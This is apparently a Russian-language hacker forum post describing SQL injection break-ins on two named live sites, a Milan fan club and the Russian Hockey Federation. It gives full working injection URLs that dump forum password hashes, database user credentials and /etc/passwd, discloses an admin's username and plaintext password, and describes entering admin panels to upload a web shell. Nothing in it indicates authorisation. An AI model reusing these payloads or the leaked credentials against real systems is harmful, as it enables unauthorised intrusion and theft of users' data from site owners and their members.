Рассмотренны несколько стандартных уязвимостей на интересных и живых сайтах, на которых тусуется народ, а админы не заботятся о безопасности, или заботятся но не до конца...
Начнем, собственно, с футбола, итак, взглянем на сайт оффициального фан-клуба гранда мирового футбола, команды
Милан..
www.acmilanfan.ru
немного поизучав сайт и подставляя к параметрам символ
' на предмет иньекции, можно заметить, что места для внедрения существуют, и не в едином количестве. Вобщем, выбираем любой бажный скрипт и действуем:
http://www.acmilanfan.ru/guestbook.php?section=1+and+1=0+union+select+1,2,3 ,concat_ws(0x3a,id,name,member_login_key,email,leg acy_password),5,6
быстро глядим на версию - она четвертая, и стандартных таблиц типа
users не предвидется, но не будем о грустном.. Ведь на сайте стоит форум IPB 2.0.4, но, к сожалению, стандартный префикс
ibf_ подходить отказывается. Немного пораскинув мозгами, обнаруживаем, что префикс у базы форума -
ipb_, и сразу просматриваем таблицу
ipb_members
http://www.acmilanfan.ru/guestbook.php?section=1+and+1=0+union+select+1,2,3 ,concat_ws(0x3a,id,name,email,legacy_password),5,6 +from+ipb_members/*
итак, мы имеем хеши пользователей форума.
Строго говоря, в форумах IPB 2+ хеши соленые и хранятся в таблице
members_converge в полях
converge_pass_hash (
хеш) и
converge_pass_salt (
соль), а в поле
legacy_password хранятся не соленые хеши, но далеко не всегда, в даннам случае нам повезло. А повезло потому, что хеш одного из админов из-за своей простоты сбручивается и зайдя в админку стандартными средствами, через смайлы, заливается шелл...
И рассмотрим еще один примерчик, имеющий отношение к анонсированному раннее хоккею -
www.fhr.ru
как видно из названия - это
Федерация хоккея России, индекс
pr у сайта довольно высокий -
5. на сайте есть куча разделов, форум, а обратясь
www.domainsdb.net видно, что вместе с
fhr.ru хостятся другие сайты
sportsrussia.ru,
volley.ru,
photosport.ru,
vancouver-2010.ru и некоторые другие.
Итак, погуляв по сайту находим, куда нам запустить свои шаловливые ручонки. А вынув руки видим что версия mysql на сайте пятая, глядим таблицы:
http://www.fhr.ru/new_news/index.php?id=-1019'+union+select+1,2,concat_ws(0x3a,table_name), 4,5,6,7,8,9,0,1+from+information_schema.tables+lim it+19,1/*
форум на сайте -
phpbb, со стандартым префиксом -
phpbb_, смотрим админские записи в таблице
phpbb_users
http://www.fhr.ru/new_news/index.php?id=-1019'+union+select+1,2,concat_ws(0x3a,user_id,user name,user_password,user_level),4,5,6,7,8,9,0,1+fro m+phpbb_users+where+user_level=1+limit+0,1/*
опять таки один из трех админов имеет достаточно тривиальный пароль -
Max:
metallica. А значит доступ в админку у нас есть! идем туда и заливаем шелл одним из способов, которые приводил
k1b0rg, благо он все расписал подробно.
По этому сайту остается только добавить что доступ к таблице
mysql также присутствует:
http://www.fhr.ru/new_news/index.php?id=-1019'+union+select+1,2,concat_ws(0x3a,user,passwor d),4,5,6,7,8,9,0,1+from+mysql.user/*
А также вовсю открыт читальный зал:
http://www.fhr.ru/new_news/index.php?id=-1019'+union+select+1,2,load_file('/etc/passwd'),4,5,6,7,8,9,0,1/*
То есть мы имеем полный джентельменский набор
спасибо за внимание, целую ваши мысли
/PS/ Вперед на Россия-Польша!